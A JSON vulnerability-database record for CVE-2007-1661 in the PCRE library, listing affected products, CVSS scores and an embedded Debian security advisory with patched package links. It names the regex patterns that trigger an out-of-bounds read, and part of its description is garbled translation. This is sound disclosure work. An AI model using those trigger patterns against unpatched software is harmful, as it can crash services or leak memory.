            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.0"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.1"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.3"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1"
          },
          {
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0.1"
          },
          {
            "model": "networks self-service ccss7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-0"
          },
          {
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "model": "acrobat standard",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.1"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "model": "aes",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "chicken",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "chicken",
            "version": "3.1"
          },
          {
            "model": "messaging storage server mss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "model": "advanced workstation for the itanium processor ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.7"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "linux",
            "scope": null,
            "trust": 0.3,
            "vendor": "gentoo",
            "version": null
          },
          {
            "model": "foundation r 2.2.1-r1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "r",
            "version": null
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "model": "networks peri workstation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.5"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.4"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.8"
          },
          {
            "model": "solaris 10.0 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1"
          },
          {
            "model": "enterprise linux server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "model": "chicken",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "chicken",
            "version": "3.0"
          },
          {
            "model": "enterprise linux as ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "10"
          },
          {
            "model": "reader",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.1"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.5"
          },
          {
            "model": "interactive response",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0"
          },
          {
            "model": "message networking mn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.1"
          },
          {
            "model": "fedora",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "7"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.1"
          },
          {
            "model": "acrobat professional",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.2"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.7"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.0"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "ccs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.0"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.6"
          },
          {
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "model": "enterprise linux desktop workstation client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "intuity audix lx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "pcre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pcre",
            "version": "3.4"
          },
          {
            "model": "networks peri application",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "model": "pcre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pcre",
            "version": "4.5"
          },
          {
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.5"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.04"
          },
          {
            "model": "pcre",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "pcre",
            "version": "7.3"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.2"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.1"
          },
          {
            "model": "interactive response",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "enterprise linux es ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "pcre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pcre",
            "version": "5.0"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.2"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.9"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.04"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "26346"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-106"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-001064"
          },
          {
            "db": "NVD",
            "id": "CVE-2007-1661"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:pcre:pcre",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:apple:mac_os_x",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:apple:mac_os_x_server",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-001064"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Tavis Ormandy taviso@gentoo.org",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-106"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2007-1661",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.4,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2007-1661",
                "impactScore": 4.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.4,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-25023",
                "impactScore": 4.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2007-1661",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2007-1661",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200711-106",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-25023",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-25023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-106"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-001064"
          },
          {
            "db": "NVD",
            "id": "CVE-2007-1661"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Perl-Compatible Regular Expression (PCRE) library before 7.3 backtracks too far when matching certain input bytes against some regex patterns in non-UTF-8 mode, which allows context-dependent attackers to obtain sensitive information or cause a denial of service (crash), as demonstrated by the \"\\X?\\d\" and \"\\P{L}?\\d\" patterns. Perl-Compatible Regular Expression (PCRE) The library contains UTF-8 When processing regular expression strings in modes other than, important information is leaked or service operation is interrupted because it is read in excess from the beginning. (DoS) There is a vulnerability that becomes a condition.\u201c\\X?\\d\u201d and \u201c\\P{L}?\\d\u201d Format regular expression UTF-8 When used in other modes, important information is taken or service operation is interrupted (DoS) There is a possibility of being put into a state. PCRE regular-expression library is prone to multiple security vulnerabilities. \nAttackers can exploit these issues to execute arbitrary code, cause denial-of-service conditions, or launch other attacks in the context of the application using the affected library. PCRE (Perl Compatible Regular Expressions) is an open source regular expression library written in C language developed by software developer Philip Hazel. There is an information leakage vulnerability in pcre\u0027s method of processing certain malformed regular expressions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1399-1                  security@debian.org\nhttp://www.debian.org/security/                           Florian Weimer\nNovember 5th, 2007                    http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage        : pcre3\nVulnerability  : several\nProblem type   : local (remote)\nDebian-specific: no\nCVE Ids        : CVE-2007-1659 CVE-2007-1660 CVE-2007-1661 CVE-2007-1662\n                 CVE-2007-4766 CVE-2007-4767 CVE-2007-4768\n\nTavis Ormandy of the Google Security Team has discovered several\nsecurity issues in PCRE, the Perl-Compatible Regular Expression library,\nwhich potentially allow attackers to execute arbitrary code by compiling\nspecially crafted regular expressions. \n\nVersion 7.0 of the PCRE library featured a major rewrite of the regular\nexpression compiler, and it was deemed infeasible to backport the\nsecurity fixes in version 7.3 to the versions in Debian\u0027s stable and\noldstable distributions (6.7 and 4.5, respectively).  Therefore, this\nupdate contains version 7.3, with special patches to improve the\ncompatibility with the older versions.  As a result, extra care is\nnecessary when applying this update. \n\nThe Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2007-1659\n\n    Unmatched \\Q\\E sequences with orphan \\E codes can cause the compiled\n    regex to become desynchronized, resulting in corrupt bytecode that may\n    result in multiple exploitable conditions. \n\nCVE-2007-1660\n \n    Multiple forms of character class had their sizes miscalculated on\n    initial passes, resulting in too little memory being allocated. \n\nCVE-2007-1661\n\n    Multiple patterns of the form  \\X?\\d or \\P{L}?\\d in non-UTF-8 mode\n    could backtrack before the start of the string, possibly leaking\n    information from the address space, or causing a crash by reading out\n    of bounds. \n\nCVE-2007-1662\n\n    A number of routines can be fooled into reading past the end of an\n    string looking for unmatched parentheses or brackets, resulting in a\n    denial of service. \n\nCVE-2007-4766\n\n    Multiple integer overflows in the processing of escape sequences could\n    result in heap overflows or out of bounds reads/writes. \n\nCVE-2007-4767\n\n    Multiple infinite loops and heap overflows were disovered in the\n    handling of \\P and \\P{x} sequences, where the length of these\n    non-standard operations was mishandled. \n\nCVE-2007-4768\n\n    Character classes containing a lone unicode sequence were incorrectly\n    optimised, resulting in a heap overflow. \n\nFor the stable distribution (etch), these problems have been fixed in\nversion 6.7+7.4-2. \n\nFor the old stable distribution (sarge), these problems have been fixed in\nversion 4.5+7.4-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 7.3-1. \n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/p/pcre3/pcre3_4.5+7.4-1.dsc\n    Size/MD5 checksum:      883 c0a3ccb50369530f99e2316800fc8235\n  http://security.debian.org/pool/updates/main/p/pcre3/pcre3_4.5+7.4-1.diff.gz\n    Size/MD5 checksum:    95042 afc6a74beeef8cf5d176f67c69d24134\n  http://security.debian.org/pool/updates/main/p/pcre3/pcre3_4.5+7.4.orig.tar.gz\n    Size/MD5 checksum:  1106897 de886b22cddc8eaf620a421d3041ee0b\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/p/pcre3/pgrep_4.5+7.4-1_all.deb\n    Size/MD5 checksum:      762 6eaceaa90e829e7cdfa06fb998bb8233\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_alpha.deb\n    Size/MD5 checksum:   218176 350cc1e53f59d700e499d1a748f8cbd8\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_alpha.deb\n    Size/MD5 checksum:   191076 fb92cd7ca9ef7716e60160acea9d8074\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_alpha.deb\n    Size/MD5 checksum:    21342 27b99f0f6f80046b565fb2ee4521bc9f\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_arm.deb\n    Size/MD5 checksum:   209516 854273bab63857eaf33161db3c51fafb\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_arm.deb\n    Size/MD5 checksum:    19404 dceedf5791eb956b0c17d981fde97d60\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_arm.deb\n    Size/MD5 checksum:   183560 a2571d9ddd20dea2b8c02c6f82aa2e04\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_hppa.deb\n    Size/MD5 checksum:   208360 30d77147bb19d09c3022892f3c56799b\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_hppa.deb\n    Size/MD5 checksum:    21022 c7a12598a8d72e3a1920ddf59d41c05b\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_hppa.deb\n    Size/MD5 checksum:   190744 14a88e3a22a4513b33fd190fa985c459\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_i386.deb\n    Size/MD5 checksum:   206134 433a36e096973d372994b3652504707f\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_i386.deb\n    Size/MD5 checksum:   183984 aa21622f099330f60614304832e4c7f5\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_i386.deb\n    Size/MD5 checksum:    19034 d9af02efce9d0a499a0ab175a66a22ee\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_ia64.deb\n    Size/MD5 checksum:   228448 8185ea0adb742d386eafbedb1a6150fa\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_ia64.deb\n    Size/MD5 checksum:    24758 78fe5bff205289853471e48df1c9313f\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_ia64.deb\n    Size/MD5 checksum:   211152 cea2a6ce5b965832743c0934147b9dc6\n\nm68k architecture (Motorola Mc680x0)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_m68k.deb\n    Size/MD5 checksum:   172344 e36b664fd639e7da09087e48e3015e1c\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_m68k.deb\n    Size/MD5 checksum:    17974 e4cf7a1f5c4e877e6303de0f1713bf37\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_m68k.deb\n    Size/MD5 checksum:   194320 ec7a340511218566fbf8fd24107c8db4\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_mips.deb\n    Size/MD5 checksum:   181276 c6d1b927b0c1d76ef0f8c9aab01cc46d\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_mips.deb\n    Size/MD5 checksum:   208676 0cac847f1c0aac143dc4221e94591fa8\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_mips.deb\n    Size/MD5 checksum:    20088 746734d3c58c1182f6e789e90421edab\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_mipsel.deb\n    Size/MD5 checksum:    20236 cd7c9b57558c3f02336ef1a9336defd1\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_mipsel.deb\n    Size/MD5 checksum:   207652 676e7376ae34519aeffca833fe148920\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_mipsel.deb\n    Size/MD5 checksum:   181050 dfc9c14755d8cd1f6eda5869fc0cb7aa\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_powerpc.deb\n    Size/MD5 checksum:   185100 9f43e18ab5ca3fb66955c6e6c2ea8a66\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_powerpc.deb\n    Size/MD5 checksum:    21244 d38c9a2953a360fee4985b16faf90356\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_powerpc.deb\n    Size/MD5 checksum:   213414 d951d611b6db1843939c258b9ae75b4d\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_s390.deb\n    Size/MD5 checksum:   207600 67a6569168be876d2b277ab39741c8a8\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_s390.deb\n    Size/MD5 checksum:    20146 9d444e72c0d2c5801dd73fc615fdf21b\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_s390.deb\n    Size/MD5 checksum:   186128 fcf344c6fe92b16fac749d20c31e27b2\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_sparc.deb\n    Size/MD5 checksum:   182522 056c33ca98c1af1872554f11890a8aad\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_sparc.deb\n    Size/MD5 checksum:   206190 f03644175e2850034f6808f0d1474128\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_sparc.deb\n    Size/MD5 checksum:    19582 6ff7847326eb7d43bd47e889b4a41b19\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/p/pcre3/pcre3_6.7+7.4-2.diff.gz\n    Size/MD5 checksum:    79078 1894a9a0dbab52b63d7e1a28f37ab6c6\n  http://security.debian.org/pool/updates/main/p/pcre3/pcre3_6.7+7.4-2.dsc\n    Size/MD5 checksum:      888 4db4d7a4b61dada63242d7a95eaec294\n  http://security.debian.org/pool/updates/main/p/pcre3/pcre3_6.7+7.4.orig.tar.gz\n    Size/MD5 checksum:  1106897 de886b22cddc8eaf620a421d3041ee0b\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_alpha.deb\n    Size/MD5 checksum:    90652 e33f31b71bfc1786479d5de48b920276\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_alpha.deb\n    Size/MD5 checksum:   265062 0b62fa0afb187330894b04961325471f\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_alpha.deb\n    Size/MD5 checksum:    21038 a7c378c89d6f69a5f04902b6a45a2a6d\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_alpha.deb\n    Size/MD5 checksum:   209104 52e7e3c9a756535f6f02dd07df1d276e\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_amd64.deb\n    Size/MD5 checksum:    89822 b617645e94ca5269c1c757c7eb0a03bb\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_amd64.deb\n    Size/MD5 checksum:    20156 cf3f0d1a30d10a64c3f8067d5c8b98ad\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_amd64.deb\n    Size/MD5 checksum:   198372 f0b2e646431302b576e0de6f4e4cbd0c\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_amd64.deb\n    Size/MD5 checksum:   249792 cfcc6c71907b4aafd1f050569f413d2c\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_arm.deb\n    Size/MD5 checksum:    88786 70d5ed4db2b37df871483e236430bfd9\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_arm.deb\n    Size/MD5 checksum:   198022 c10252b7cc4cb6f603efc21e20f6172f\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_arm.deb\n    Size/MD5 checksum:   243784 3a34b552827049e989be0361faf88078\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_arm.deb\n    Size/MD5 checksum:    19920 9bd0dafb9121bb40fa2e556b8cc27c11\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_hppa.deb\n    Size/MD5 checksum:   256874 aad214ff1157b3354c20348eb00e08ea\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_hppa.deb\n    Size/MD5 checksum:    92136 7f4b7cbfd19c837fa2e412d289ab662c\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_hppa.deb\n    Size/MD5 checksum:    20726 c759b1d33dd8ea8811c96ac9664c6242\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_hppa.deb\n    Size/MD5 checksum:   201700 c307db03fcc9d8e2cc1becd15e6458f6\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_i386.deb\n    Size/MD5 checksum:   246578 6fc5148f6848d4b90041a9d3d738779a\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_i386.deb\n    Size/MD5 checksum:    89706 d59cc3cc167b6d81c18bd13ded830fa6\n  